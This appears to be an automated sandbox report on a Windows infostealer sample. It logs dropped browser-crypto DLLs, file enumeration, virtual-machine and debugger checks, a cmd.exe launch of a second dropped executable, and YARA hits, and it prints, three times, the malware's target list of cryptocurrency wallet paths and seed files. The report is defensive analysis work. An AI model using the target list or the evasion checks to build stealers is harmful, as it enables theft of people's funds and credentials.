Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe API coverage: 5.6 %
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe TID: 8008 Thread sleep count: 763 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe TID: 8008 Thread sleep time: -542493s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe TID: 8008 Thread sleep count: 9235 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe TID: 8008 Thread sleep time: -6566085s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00412570
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D1C0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,LoadLibraryA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004015C0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00411650
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040B610
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040DB60
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00411B80
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040D540
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_004121F0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_00401120 GetSystemInfo,ExitProcess, 0_2_00401120
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: Amcache.hve.9.dr Binary or memory string: VMware
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr Binary or memory string: VMware, Inc.
Source: YEnIrzZUUw.exe, 00000000.00000002.2246016069.0000000004255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW<u
Source: Amcache.hve.9.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: YEnIrzZUUw.exe, 00000000.00000002.2246016069.0000000004255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: YEnIrzZUUw.exe, 00000000.00000002.2246016069.0000000004228000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: Amcache.hve.9.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr Binary or memory string: vmci.sys
Source: Amcache.hve.9.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.9.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: YEnIrzZUUw.exe, 00000000.00000002.2246016069.00000000041FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: Amcache.hve.9.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.9.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_00402130 LdrInitializeThunk, 0_2_00402130
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00417B4E
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00416240
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_00415DC0 mov eax, dword ptr fs:[00000030h] 0_2_00415DC0
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_0058E8F6 mov eax, dword ptr fs:[00000030h] 7_2_0058E8F6
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00404C70
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_00419DC7 SetUnhandledExceptionFilter, 0_2_00419DC7
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00417B4E
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004173DD
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C91B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C91B66C
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C91B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C91B1F7
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6CACAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CACAC62
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_0058CC07 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_0058CC07
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_00587C28 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_00587C28
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_00588609 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00588609
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_00588757 SetUnhandledExceptionFilter, 7_2_00588757

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00415D00
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe "C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe" Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C91B341 cpuid 0_2_6C91B341
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00414570
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: GetLocaleInfoW, 7_2_00591A67
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: GetLocaleInfoW, 7_2_00597A1C
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 7_2_00597B45
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 7_2_005973E1
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: GetLocaleInfoW, 7_2_00597C4C
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 7_2_00597D19
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: EnumSystemLocalesW, 7_2_00597659
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: EnumSystemLocalesW, 7_2_005916C2
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: EnumSystemLocalesW, 7_2_005976A4
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: EnumSystemLocalesW, 7_2_0059773F
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 7_2_005977CC
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_00414450 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA, 0_2_00414450
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_004143C0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 0_2_004144B0
Source: Amcache.hve.9.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

barindex
Source: Yara match File source: 0.2.YEnIrzZUUw.exe.4190e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.YEnIrzZUUw.exe.5b70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.YEnIrzZUUw.exe.5b70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.YEnIrzZUUw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.YEnIrzZUUw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.YEnIrzZUUw.exe.4190e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2243889460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2245886678.0000000004190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1690988607.0000000005B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2246016069.00000000041FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: YEnIrzZUUw.exe PID: 7428, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.YEnIrzZUUw.exe.4190e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.YEnIrzZUUw.exe.5b70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.YEnIrzZUUw.exe.4190e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.YEnIrzZUUw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.YEnIrzZUUw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.YEnIrzZUUw.exe.5b70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2243889460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2245886678.0000000004190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1690988607.0000000005B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: YEnIrzZUUw.exe PID: 7428, type: MEMORYSTR
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
